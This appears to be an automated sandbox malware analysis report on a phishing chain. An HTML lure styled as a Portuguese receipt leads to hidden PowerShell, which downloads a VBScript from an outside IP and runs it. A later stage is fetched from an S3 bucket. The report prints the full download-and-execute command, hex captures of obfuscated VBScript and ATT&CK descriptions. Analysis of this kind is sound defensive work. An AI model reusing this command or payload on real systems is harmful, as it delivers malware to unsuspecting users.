2025-03-24 16:30:41 UTC	1024	IN	Data Raw: 56 6a 32 28 36 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 38 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 35 29 0d 0a 59 73 76 6b 68 69 75 61 76 4a 71 54 57 59 78 61 72 43 65 4b 65 6d 6b 67 69 6b 74 41 6b 78 65 6e 65 73 7a 78 51 20 3d 20 6c 6c 58 6f 59 56 6a 32 28 37 34 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 39 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 34 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 39 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 34 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 39 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 33 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 33 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 32 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 31 38 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 31 33 29 20 2b 20 6c 6c 58 6f 59 56 Data Ascii: Vj2(67) + llXoYVj2(87) + llXoYVj2(75)YsvkhiuavJqTWYxarCeKemkgiktAkxeneszxQ = llXoYVj2(74) + llXoYVj2(109) + llXoYVj2(104) + llXoYVj2(90) + llXoYVj2(74) + llXoYVj2(97) + llXoYVj2(73) + llXoYVj2(103) + llXoYVj2(72) + llXoYVj2(118) + llXoYVj2(113) + llXoYV
2025-03-24 16:30:41 UTC	16384	IN	Data Raw: 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 31 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 32 31 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 38 33 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 39 38 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 31 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 31 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 31 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 38 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 32 32 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 38 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 32 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 31 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 39 38 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 32 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 38 29 20 2b 20 6c 6c Data Ascii: 0) + llXoYVj2(117) + llXoYVj2(121) + llXoYVj2(83) + llXoYVj2(98) + llXoYVj2(110) + llXoYVj2(117) + llXoYVj2(117) + llXoYVj2(80) + llXoYVj2(77) + llXoYVj2(122) + llXoYVj2(108) + llXoYVj2(120) + llXoYVj2(71) + llXoYVj2(98) + llXoYVj2(72) + llXoYVj2(78) + ll
2025-03-24 16:30:41 UTC	1024	IN	Data Raw: 6a 32 28 31 30 34 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 38 32 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 32 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 32 31 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 35 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 36 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 37 31 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 32 30 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 36 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 31 30 34 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 38 32 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 36 39 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 36 37 29 20 2b 20 6c 6c 58 6f 59 56 6a 32 28 36 36 29 0d 0a 49 72 77 5a 67 47 71 62 44 62 76 74 61 4e 6d 61 73 51 70 6f 76 41 48 50 6d 4d 47 67 64 57 6e 77 51 6c 53 42 20 3d 20 6c 6c 58 6f 59 56 Data Ascii: j2(104) + llXoYVj2(82) + llXoYVj2(120) + llXoYVj2(121) + llXoYVj2(105) + llXoYVj2(106) + llXoYVj2(71) + llXoYVj2(120) + llXoYVj2(67) + llXoYVj2(104) + llXoYVj2(82) + llXoYVj2(69) + llXoYVj2(67) + llXoYVj2(66)IrwZgGqbDbvtaNmasQpovAHPmMGgdWnwQlSB = llXoYV

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.8	49730	3.5.129.15	443	5744	C:\Windows\System32\wscript.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-24 16:33:09 UTC	177	OUT	GET /gEkBKUi HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) Host: ld-2403-p.s3.us-east-2.amazonaws.com
2025-03-24 16:33:09 UTC	468	IN	HTTP/1.1 200 OK x-amz-id-2: EeYZbsM+P9VXuHj77+xyzHzUlpVpFY3sbGiB5ncSuOegOLxgXjyO5JB/1DAFD4VhfCqEC4L8phoXVvNeeJ7WrqPK8zroBIBFiPqeNuIoJVM= x-amz-request-id: YQ2TDBS9ZT5JK8AS Date: Mon, 24 Mar 2025 16:33:10 GMT Last-Modified: Mon, 24 Mar 2025 12:47:03 GMT ETag: "5f8ebeae102252d25fcbba4c682fceb0-10" x-amz-server-side-encryption: AES256 Accept-Ranges: bytes Content-Type: application/octet-stream Content-Length: 49064428 Server: AmazonS3 Connection: close
2025-03-24 16:33:09 UTC	16384	IN	Data Raw: 0d 0a 6c 6a 45 4b 41 76 6b 4e 74 71 47 6a 4c 4f 49 68 67 71 56 64 6a 7a 66 59 57 57 6f 45 6b 51 6a 20 3d 20 56 6e 76 4e 28 31 30 34 29 20 2b 20 56 6e 76 4e 28 38 39 29 20 2b 20 56 6e 76 4e 28 39 38 29 20 2b 20 56 6e 76 4e 28 31 31 38 29 20 2b 20 56 6e 76 4e 28 36 35 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 31 30 33 29 20 2b 20 56 6e 76 4e 28 31 30 33 29 20 2b 20 56 6e 76 4e 28 36 35 29 20 2b 20 56 6e 76 4e 28 31 31 30 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 38 37 29 20 2b 20 56 6e 76 4e 28 31 30 39 29 20 2b 20 56 6e 76 4e 28 37 36 29 20 2b 20 56 6e 76 4e 28 31 31 35 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 31 31 34 29 20 2b 20 56 6e 76 4e 28 37 33 29 20 2b 20 56 6e 76 4e 28 31 30 30 29 20 2b Data Ascii: ljEKAvkNtqGjLOIhgqVdjzfYWWoEkQj = VnvN(104) + VnvN(89) + VnvN(98) + VnvN(118) + VnvN(65) + VnvN(68) + VnvN(103) + VnvN(103) + VnvN(65) + VnvN(110) + VnvN(107) + VnvN(87) + VnvN(109) + VnvN(76) + VnvN(115) + VnvN(107) + VnvN(114) + VnvN(73) + VnvN(100) +
2025-03-24 16:33:09 UTC	556	IN	Data Raw: 31 32 31 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 31 32 31 29 20 2b 20 56 6e 76 4e 28 37 32 29 20 2b 20 56 6e 76 4e 28 37 31 29 20 2b 20 56 6e 76 4e 28 37 34 29 20 2b 20 56 6e 76 4e 28 37 32 29 20 2b 20 56 6e 76 4e 28 36 35 29 20 2b 20 56 6e 76 4e 28 38 37 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 31 31 39 29 20 2b 20 56 6e 76 4e 28 38 30 29 20 2b 20 56 6e 76 4e 28 31 30 33 29 20 2b 20 56 6e 76 4e 28 31 31 39 29 20 2b 20 56 6e 76 4e 28 37 33 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 38 35 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 37 35 29 20 2b 20 56 6e 76 4e 28 31 30 35 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 31 30 34 29 20 2b 20 56 6e 76 4e 28 36 37 29 20 Data Ascii: 121) + VnvN(82) + VnvN(121) + VnvN(72) + VnvN(71) + VnvN(74) + VnvN(72) + VnvN(65) + VnvN(87) + VnvN(106) + VnvN(119) + VnvN(80) + VnvN(103) + VnvN(119) + VnvN(73) + VnvN(68) + VnvN(85) + VnvN(101) + VnvN(75) + VnvN(105) + VnvN(88) + VnvN(104) + VnvN(67)
2025-03-24 16:33:09 UTC	16384	IN	Data Raw: 76 4e 28 31 31 32 29 20 2b 20 56 6e 76 4e 28 31 31 37 29 20 2b 20 56 6e 76 4e 28 31 30 39 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 31 31 39 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 39 38 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 38 31 29 20 2b 20 56 6e 76 4e 28 31 32 32 29 20 2b 20 56 6e 76 4e 28 31 32 30 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 31 32 30 29 20 2b 20 56 6e 76 4e 28 31 31 34 29 20 2b 20 56 6e 76 4e 28 31 30 32 29 20 2b 20 56 6e 76 4e 28 31 30 38 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e Data Ascii: vN(112) + VnvN(117) + VnvN(109) + VnvN(101) + VnvN(119) + VnvN(68) + VnvN(68) + VnvN(88) + VnvN(98) + VnvN(79) + VnvN(81) + VnvN(122) + VnvN(120) + VnvN(79) + VnvN(88) + VnvN(68) + VnvN(120) + VnvN(114) + VnvN(102) + VnvN(108) + VnvN(88) + VnvN(79) + VnvN
2025-03-24 16:33:09 UTC	1024	IN	Data Raw: 76 4e 28 39 30 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 37 32 29 20 2b 20 56 6e 76 4e 28 36 36 29 20 2b 20 56 6e 76 4e 28 36 36 29 20 2b 20 56 6e 76 4e 28 37 38 29 20 2b 20 56 6e 76 4e 28 31 30 35 29 20 2b 20 56 6e 76 4e 28 31 31 34 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 31 31 32 29 20 2b 20 56 6e 76 4e 28 31 30 33 29 20 2b 20 56 6e 76 4e 28 38 30 29 20 2b 20 56 6e 76 4e 28 38 30 29 20 2b 20 56 6e 76 4e 28 38 34 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 36 37 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 31 31 37 29 20 2b 20 56 6e 76 4e 28 36 36 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 38 39 29 Data Ascii: vN(90) + VnvN(107) + VnvN(79) + VnvN(72) + VnvN(66) + VnvN(66) + VnvN(78) + VnvN(105) + VnvN(114) + VnvN(79) + VnvN(112) + VnvN(103) + VnvN(80) + VnvN(80) + VnvN(84) + VnvN(106) + VnvN(67) + VnvN(88) + VnvN(82) + VnvN(117) + VnvN(66) + VnvN(88) + VnvN(89)
2025-03-24 16:33:09 UTC	16384	IN	Data Raw: 70 42 6f 62 47 53 78 73 52 54 50 64 72 61 58 79 6f 6b 7a 4c 78 76 20 3d 20 56 6e 76 4e 28 37 31 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 31 30 30 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 31 30 38 29 20 2b 20 56 6e 76 4e 28 31 31 32 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 39 37 29 20 2b 20 56 6e 76 4e 28 37 35 29 20 2b 20 56 6e 76 4e 28 31 31 34 29 20 2b 20 56 6e 76 4e 28 31 30 39 29 20 2b 20 56 6e 76 4e 28 36 39 29 20 2b 20 56 6e 76 4e 28 31 30 38 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 31 30 33 29 20 2b 20 56 6e 76 4e 28 37 34 29 20 2b 20 56 6e 76 4e 28 31 31 39 29 20 2b 20 56 6e 76 4e 28 37 31 29 20 2b 20 Data Ascii: pBobGSxsRTPdraXyokzLxv = VnvN(71) + VnvN(82) + VnvN(82) + VnvN(100) + VnvN(107) + VnvN(108) + VnvN(112) + VnvN(68) + VnvN(97) + VnvN(75) + VnvN(114) + VnvN(109) + VnvN(69) + VnvN(108) + VnvN(106) + VnvN(79) + VnvN(103) + VnvN(74) + VnvN(119) + VnvN(71) +
2025-03-24 16:33:09 UTC	1024	IN	Data Raw: 6e 76 4e 28 31 31 36 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 37 33 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 37 34 29 20 2b 20 56 6e 76 4e 28 31 32 32 29 20 2b 20 56 6e 76 4e 28 31 31 37 29 20 2b 20 56 6e 76 4e 28 37 33 29 20 2b 20 56 6e 76 4e 28 31 31 32 29 20 2b 20 56 6e 76 4e 28 31 31 32 29 20 2b 20 56 6e 76 4e 28 37 38 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 37 36 29 20 2b 20 56 6e 76 4e 28 31 30 34 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 37 33 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 37 38 29 20 2b 20 56 6e 76 4e 28 36 38 29 20 2b 20 56 6e 76 4e 28 31 30 32 29 20 2b 20 56 6e 76 Data Ascii: nvN(116) + VnvN(106) + VnvN(73) + VnvN(106) + VnvN(74) + VnvN(122) + VnvN(117) + VnvN(73) + VnvN(112) + VnvN(112) + VnvN(78) + VnvN(79) + VnvN(76) + VnvN(104) + VnvN(88) + VnvN(73) + VnvN(106) + VnvN(79) + VnvN(107) + VnvN(78) + VnvN(68) + VnvN(102) + Vnv
2025-03-24 16:33:09 UTC	1749	IN	Data Raw: 6e 76 4e 28 31 30 38 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 31 30 39 29 20 2b 20 56 6e 76 4e 28 31 30 34 29 20 2b 20 56 6e 76 4e 28 31 32 32 29 20 2b 20 56 6e 76 4e 28 38 31 29 0d 0a 43 5a 7a 45 76 58 4c 4f 54 67 78 61 4b 54 49 4e 6a 46 63 75 77 76 6d 6a 59 46 71 55 45 74 58 20 3d 20 56 6e 76 4e 28 39 37 29 20 2b 20 56 6e 76 4e 28 31 32 30 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 38 35 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 38 37 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 31 30 35 29 20 2b 20 56 6e 76 4e 28 31 32 31 29 20 2b 20 56 6e 76 4e 28 37 38 29 20 2b 20 56 6e 76 4e 28 31 30 32 29 20 2b 20 56 6e 76 4e 28 37 34 29 20 2b 20 56 6e Data Ascii: nvN(108) + VnvN(101) + VnvN(109) + VnvN(104) + VnvN(122) + VnvN(81)CZzEvXLOTgxaKTINjFcuwvmjYFqUEtX = VnvN(97) + VnvN(120) + VnvN(106) + VnvN(85) + VnvN(82) + VnvN(87) + VnvN(106) + VnvN(107) + VnvN(105) + VnvN(121) + VnvN(78) + VnvN(102) + VnvN(74) + Vn
2025-03-24 16:33:09 UTC	16384	IN	Data Raw: 56 6e 76 4e 28 31 31 31 29 20 2b 20 56 6e 76 4e 28 39 38 29 20 2b 20 56 6e 76 4e 28 38 39 29 20 2b 20 56 6e 76 4e 28 31 30 37 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 31 30 33 29 0d 0a 69 58 54 56 7a 62 70 41 4a 54 42 66 77 68 6a 70 57 64 6e 61 6b 59 44 4b 4a 4f 6d 64 64 44 6f 20 3d 20 56 6e 76 4e 28 38 37 29 20 2b 20 56 6e 76 4e 28 38 31 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 36 35 29 20 2b 20 56 6e 76 4e 28 31 31 31 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 38 39 29 20 2b 20 56 6e 76 4e 28 31 32 32 29 20 2b 20 56 6e 76 4e 28 38 34 29 20 2b 20 56 6e 76 4e 28 37 39 29 20 2b 20 56 6e 76 4e 28 31 31 34 29 20 2b 20 56 6e 76 4e 28 37 31 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 Data Ascii: VnvN(111) + VnvN(98) + VnvN(89) + VnvN(107) + VnvN(101) + VnvN(103)iXTVzbpAJTBfwhjpWdnakYDKJOmddDo = VnvN(87) + VnvN(81) + VnvN(101) + VnvN(65) + VnvN(111) + VnvN(88) + VnvN(89) + VnvN(122) + VnvN(84) + VnvN(79) + VnvN(114) + VnvN(71) + VnvN(82) + VnvN(
2025-03-24 16:33:09 UTC	1024	IN	Data Raw: 38 29 20 2b 20 56 6e 76 4e 28 31 30 35 29 20 2b 20 56 6e 76 4e 28 38 37 29 20 2b 20 56 6e 76 4e 28 38 33 29 20 2b 20 56 6e 76 4e 28 38 30 29 20 2b 20 56 6e 76 4e 28 39 37 29 20 2b 20 56 6e 76 4e 28 39 37 29 20 2b 20 56 6e 76 4e 28 31 30 30 29 20 2b 20 56 6e 76 4e 28 38 38 29 20 2b 20 56 6e 76 4e 28 31 32 31 29 20 2b 20 56 6e 76 4e 28 31 30 39 29 20 2b 20 56 6e 76 4e 28 36 36 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 38 33 29 20 2b 20 56 6e 76 4e 28 38 39 29 20 2b 20 56 6e 76 4e 28 31 32 31 29 20 2b 20 56 6e 76 4e 28 31 32 31 29 20 2b 20 56 6e 76 4e 28 38 31 29 20 2b 20 56 6e 76 4e 28 38 37 29 20 2b 20 56 6e 76 4e 28 31 31 30 29 20 2b 20 56 6e 76 4e 28 31 30 30 29 20 2b 20 56 6e 76 4e 28 37 38 29 20 2b 20 56 6e 76 4e 28 31 30 39 29 20 Data Ascii: 8) + VnvN(105) + VnvN(87) + VnvN(83) + VnvN(80) + VnvN(97) + VnvN(97) + VnvN(100) + VnvN(88) + VnvN(121) + VnvN(109) + VnvN(66) + VnvN(101) + VnvN(83) + VnvN(89) + VnvN(121) + VnvN(121) + VnvN(81) + VnvN(87) + VnvN(110) + VnvN(100) + VnvN(78) + VnvN(109)
2025-03-24 16:33:10 UTC	16384	IN	Data Raw: 37 29 20 2b 20 56 6e 76 4e 28 37 35 29 20 2b 20 56 6e 76 4e 28 31 31 37 29 20 2b 20 56 6e 76 4e 28 38 34 29 20 2b 20 56 6e 76 4e 28 37 34 29 20 2b 20 56 6e 76 4e 28 31 32 31 29 20 2b 20 56 6e 76 4e 28 38 34 29 20 2b 20 56 6e 76 4e 28 31 32 32 29 20 2b 20 56 6e 76 4e 28 31 30 31 29 20 2b 20 56 6e 76 4e 28 36 36 29 20 2b 20 56 6e 76 4e 28 31 31 33 29 20 2b 20 56 6e 76 4e 28 38 32 29 20 2b 20 56 6e 76 4e 28 31 30 30 29 20 2b 20 56 6e 76 4e 28 37 33 29 20 2b 20 56 6e 76 4e 28 38 33 29 20 2b 20 56 6e 76 4e 28 37 30 29 20 2b 20 56 6e 76 4e 28 31 30 36 29 20 2b 20 56 6e 76 4e 28 31 31 30 29 20 2b 20 56 6e 76 4e 28 38 34 29 20 2b 20 56 6e 76 4e 28 31 32 32 29 20 2b 20 56 6e 76 4e 28 31 31 34 29 20 2b 20 56 6e 76 4e 28 31 30 32 29 20 2b 20 56 6e 76 4e 28 37 31 29 Data Ascii: 7) + VnvN(75) + VnvN(117) + VnvN(84) + VnvN(74) + VnvN(121) + VnvN(84) + VnvN(122) + VnvN(101) + VnvN(66) + VnvN(113) + VnvN(82) + VnvN(100) + VnvN(73) + VnvN(83) + VnvN(70) + VnvN(106) + VnvN(110) + VnvN(84) + VnvN(122) + VnvN(114) + VnvN(102) + VnvN(71)

Statistics

CPU Usage

• chrome.exe
• chrome.exe
• chrome.exe
• cmd.exe
• conhost.exe
• powershell.exe
• svchost.exe
• wscript.exe
• wscript.exe

Click to jump to process

Memory Usage

• chrome.exe
• chrome.exe
• chrome.exe
• cmd.exe
• conhost.exe
• powershell.exe
• svchost.exe
• wscript.exe
• wscript.exe

Click to jump to process

High Level Behavior Distribution

• File
• Registry

Click to dive into process behavior distribution

Click to jump to process

Target ID:	0
Start time:	12:30:05
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Imagebase:	0x7ff6e75b0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	1
Start time:	12:30:06
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1856,i,12380028377297029268,5033635301295998014,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version=20250306-183004.429000 --mojo-platform-channel-handle=2136 /prefetch:3
Imagebase:	0x7ff6e75b0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	12:30:12
Start date:	24/03/2025
Path:	C:\Program Files\Google\Chrome\Application\chrome.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Google\Chrome\Application\chrome.exe" "C:\Users\user\Desktop\COMPROVATIVO-14996813-MAR#U00c7O-ANCZ0-PD9BC - 208.html"
Imagebase:	0x7ff6e75b0000
File size:	3'388'000 bytes
MD5 hash:	E81F54E6C1129887AEA47E7D092680BF
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	12:30:36
Start date:	24/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd /K powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx
Imagebase:	0x8e0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	8
Start time:	12:30:36
Start date:	24/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6e60e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	9
Start time:	12:30:37
Start date:	24/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -windowstyle hidden -Command "$u='http://3.133.160.140/349.php'; $t=$env:temp + '\5049.vbs'; Invoke-WebRequest -Uri $u -OutFile $t; if (Test-Path $t) { Start-Process $t }" -NoNewWindow #Habilitar Visualiza o de ficheiro DOCx
Imagebase:	0x2f0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	12:30:42
Start date:	24/03/2025
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Imagebase:	0x7ff66acf0000
File size:	55'320 bytes
MD5 hash:	B7F884C1B74A263F746EE12A5F7C9F6A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	12:30:44
Start date:	24/03/2025
Path:	C:\Windows\SysWOW64\wscript.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\5049.vbs"
Imagebase:	0xcc0000
File size:	147'456 bytes
MD5 hash:	FF00E0480075B095948000BDC66E81F0
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	12:33:06
Start date:	24/03/2025
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	wscript.exe "C:\Users\user\AppData\Local\Temp\9772.vbs"
Imagebase:	0x7ff69d3a0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may exploit software vulnerabilities in client applications to execute code. Vulnerabilities can exist in software due to unsecure coding practices that can lead to unanticipated behavior. Adversaries can take advantage of certain vulnerabilities through targeted exploitation for the purpose of arbitrary code execution. Oftentimes the most valuable exploits to an offensive toolkit are those that can be used to obtain code execution on a remote system because they can be used to gain access to that system. Users will expect to see files related to the applications they commonly used to do work, so they are a useful target for exploit research and development because of their high utility.
Tactics:	Execution
Data Sources:	Application Log: Application Log Content, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

